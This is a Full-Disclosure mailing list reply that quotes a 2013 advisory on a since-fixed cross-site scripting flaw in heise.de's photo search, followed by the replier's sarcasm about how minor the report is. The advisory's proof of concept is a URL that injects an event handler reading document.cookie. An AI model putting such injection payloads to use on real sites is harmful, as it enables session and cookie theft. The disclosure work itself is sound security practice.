On Thu, 10 Jan 2013 19:47:25 +0100 Stefan Schurtz <[email protected]> wrote:
> -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Advisory: heise.de - Cross-site Scripting vulnerability > Advisory ID: SSCHADV2013-002 > Author: Stefan Schurtz > Affected Software: Successfully tested on heise.de > Vendor URL: http://www.heise.de > Vendor Status: fixed > > ========================== > Vulnerability Description > ========================== > > http://www.heise.de is prone to a XSS vulnerability > > ========================== > PoC-Exploit > ========================== > > http://www.heise.de/foto/galerie/suche/photo/?suchwort="; > onMouseMove=alert(document.cookie) ' > > ========================== > Solution > ========================== > > fixed > > ========================== > Disclosure Timeline > ========================== > > 03-Jan-2013 - informed heise Security > 04-Jan-2012 - fixed by developer > > ========================== > Credits > ========================== > > Vulnerability found and advisory written by Stefan Schurtz. > Now thats valeable information. Thank god that you informed about this groundbreaking issue, Stefan. I will update my personal heise.de right away. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
